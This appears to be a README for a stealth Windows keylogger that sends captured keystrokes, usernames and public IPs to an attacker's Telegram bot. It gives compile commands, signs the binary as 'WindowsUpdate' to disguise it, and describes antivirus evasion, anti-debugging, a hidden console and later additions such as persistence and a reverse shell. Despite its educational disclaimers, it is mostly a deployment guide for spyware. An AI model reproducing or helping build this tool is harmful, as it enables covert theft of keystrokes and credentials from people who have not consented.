⚠️ Disclaimer
This project is for educational and security research purposes only.
Unauthorized use against systems you do not own or operate with explicit permission is illegal and prohibited.
This project is a stealth-focused Windows keylogger written in C++17, leveraging the Windows API and WinHTTP to exfiltrate keystroke data securely to Telegram.
- Captures all keystrokes via
WH_KEYBOARD_LLhook. - Securely exfiltrates data using WinHTTP to a private Telegram bot.
- Evades antivirus detection using manual API resolution (
LoadLibraryA+GetProcAddress). - Generates a unique victim ID using
CoCreateGuid. - Runs silently in the background (hidden console).
- Implements anti-debugging via
IsDebuggerPresent.
✅ No static API imports — all Windows APIs are resolved at runtime.
✅ Native WinHTTP for HTTP(S) communication (no external libraries).
✅ Anti-debugging check — exits if debugger is detected.
✅ Multi-threaded design for log handling.
✅ Infinite message loop to persist process invisibly.
✅ Graceful cleanup on exit.
Install the MinGW cross-compiler:
sudo apt update
sudo apt install g++-mingw-w64-x86-64🧱 Compile the Keylogger
x86_64-w64-mingw32-g++ -std=c++17 update.cpp -o update.exe \
-static-libgcc -static-libstdc++ \
-lwinhttp -luser32 -lrpcrt4 -lole32 -ladvapi32🔏 Sign the Executable
osslsigncode sign \
-certs mycert.pem \
-key mykey.pem \
-n "WindowsUpdate" \
-i http://microsoft.com \
-t http://timestamp.sectigo.com \
-in update.exe \
-out updateasus.exe🤖 Telegram Bot Setup To enable Telegram exfiltration, edit the following lines in update.cpp: const std::string BOT_TOKEN_PLAINTEXT = "REPLACE_WITH_YOUR_TOKEN"; const std::string CHAT_ID_PLAINTEXT = "REPLACE_WITH_YOUR_CHAT_ID";
🔁 Steps:
1.Create a bot via @BotFather on Telegram. 2.Start a chat with your bot. 3.Visit or search @userinfobot >to get chat-id 4.Replace both placeholders in the code. 5.Recompile the binary.
🧪 Runtime Behavior
Sends "target online" notification to your Telegram bot. Shares: Victim's GUID Username Public IP Captures and periodically exfiltrates keystrokes. Hides the console window on launch. Self-terminates if any debugger is detected.
🔍 Legal Disclaimer
This project is created for the following use cases: 🔬 Malware reverse engineering practice 🛡️ Cybersecurity education 🧪 Red team simulation on authorized systems only Do not deploy on systems you do not own or without consent. The developer assumes no responsibility for any misuse.
📌 Additional Notes
❌ No use of WinINet, Boost, or cURL. ✅ Fully written in pure C++17 using low-level Windows API. 🔧 Can be extended with: Screenshot capture Registry persistence Reverse shell or remote execution
Stay safe. Test responsibly. Learn deeply.